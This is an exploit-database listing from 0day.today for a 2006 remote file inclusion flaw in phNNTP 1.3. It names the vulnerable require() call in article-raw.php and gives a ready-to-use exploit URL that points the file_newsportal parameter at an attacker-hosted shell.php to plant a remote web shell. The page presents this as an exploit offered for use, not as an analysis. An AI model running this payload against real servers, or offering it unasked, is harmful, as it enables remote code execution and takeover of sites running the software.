[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability

Author
Drago84
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-663
Category
web applications
Date add
07-08-2006
Platform
unsorted
=================================================================
phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability
=================================================================



phNNTP v1.3 Remote File Inclusion

CreW: ToxiC

Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz

Problem Is:
require("$file_newsportal");

Page Affect:
article-raw.php

Path:
Declare file_newsportal

ExP:
http://www.site.com/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?



#  0day.today [2024-12-25]  #